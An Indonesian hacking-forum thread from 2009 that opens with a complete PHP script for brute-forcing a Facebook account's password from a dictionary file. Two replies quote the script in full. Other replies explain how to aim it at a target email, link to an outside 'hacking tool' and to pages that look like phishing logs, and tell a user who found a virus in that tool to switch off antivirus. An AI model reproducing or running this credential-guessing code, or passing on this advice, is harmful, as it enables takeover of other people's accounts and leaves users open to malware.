<ask> facebook

Forum untuk membahas hacking secara umum

Moderators: Paman, Xshadow, indounderground

pujiyanto18
Posts: 37
Joined: Mon Feb 16, 2009 12:35 pm

<ask> facebook

Post by pujiyanto18 » Tue Jun 23, 2009 2:55 pm

<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m& ... m/home.php');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
################################################## ##


para master cara pake nih script nya gemnh y.....

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: <ask> facebook

Post by shad.hckr » Thu Jun 25, 2009 9:06 am

itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa.. :D

kabooorr..

User avatar
exnome
Posts: 32
Joined: Wed Nov 21, 2007 10:42 am
Location: Belakang Proxy
Contact:

Re: <ask> facebook

Post by exnome » Thu Jun 25, 2009 11:37 am

shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa.. :D

kabooorr..
bknnya tuh script php om ..... :roll: :roll:
pujiyanto18 wrote:<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m& ... m/home.php');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
################################################## ##


para master cara pake nih script nya gemnh y.....
Image
Image

User avatar
kopies
Posts: 12
Joined: Sat Dec 08, 2007 1:50 pm
Location: somewhere..
Contact:

Re: <ask> facebook

Post by kopies » Thu Jun 25, 2009 8:34 pm

exnome wrote:
shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa.. :D

kabooorr..
bknnya tuh script php om ..... :roll: :roll:
pujiyanto18 wrote:<?
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="[email protected]"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list

function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m& ... m/home.php');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}

}

if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
################################################## ##


para master cara pake nih script nya gemnh y.....

check this out @ forum.yogyafree.net

uda pernah gw bahas,, cari2 aja disana..[malas copy kesini]
*Come to me and feel my strength*

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: <ask> facebook

Post by Digital Cat » Fri Jul 03, 2009 5:01 pm

Pake aja Tools / Program gua

Digital Face Book v1.0

Di Forum X - Code Dibawah ini,coy...

Hacking Tools -> Digital Cat Tools

http://xcode.or.id/forum2/viewtopic.php?f=100&t=35703


Image

Image

Image

Image

User avatar
gunX's
Posts: 21
Joined: Mon Sep 15, 2008 1:51 pm

Re: <ask> facebook

Post by gunX's » Fri Jul 03, 2009 9:12 pm

coba yg ini oms...........

Code: Select all

http://www.yourpic.us/admin/index.html

Code: Select all

http://www.yourpic.us/admin/logs.txt
maklum buatan newbie............. :mrgreen: :mrgreen:
Image

gilang_perusak
Posts: 9
Joined: Sun Apr 05, 2009 7:11 pm

Re: <ask> facebook

Post by gilang_perusak » Tue Jul 07, 2009 4:33 pm

kakak Digital Cat kok software'a bervirus.?
tolong upload ulang lg dong kakak tanpa virus.. :D :D

User avatar
ithinkimdumb
Posts: 18
Joined: Thu Jul 09, 2009 7:03 am

Re: <ask> facebook

Post by ithinkimdumb » Thu Jul 09, 2009 1:00 pm

bervirus ?

wajar itu file exe .

coba matiin aja dulu anti virus nya .

cmiiw :)

ferbe
Posts: 5
Joined: Sun Jul 12, 2009 9:04 am

Re: <ask> facebook

Post by ferbe » Sun Jul 12, 2009 9:48 am

shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa.. :D

kabooorr..

aq gax mudeng ...tapi aku perlu taw ..tolong bgt kasi tw aku .. :?:

ferbe
Posts: 5
Joined: Sun Jul 12, 2009 9:04 am

Re: <ask> facebook

Post by ferbe » Sun Jul 12, 2009 10:08 am

ferbe wrote:
shad.hckr wrote:itu pake Perl.. edit email target, trus buat/dunlud list paswd.. trus simpen aja file itu pake extensi pl.. trus jalanin..
trus nunggu mpe jebol..
kalo ga jebol PM aja orangnya.. tanyain langsung paswdnya apa.. :D

kabooorr..

aq gax mudeng ...tapi aku perlu taw ..tolong bgt kasi tw aku .. :?:
dr awal nyalain komputer ..konek internet ..trus apa?? :lol:

Post Reply

Return to “Hacking Umum”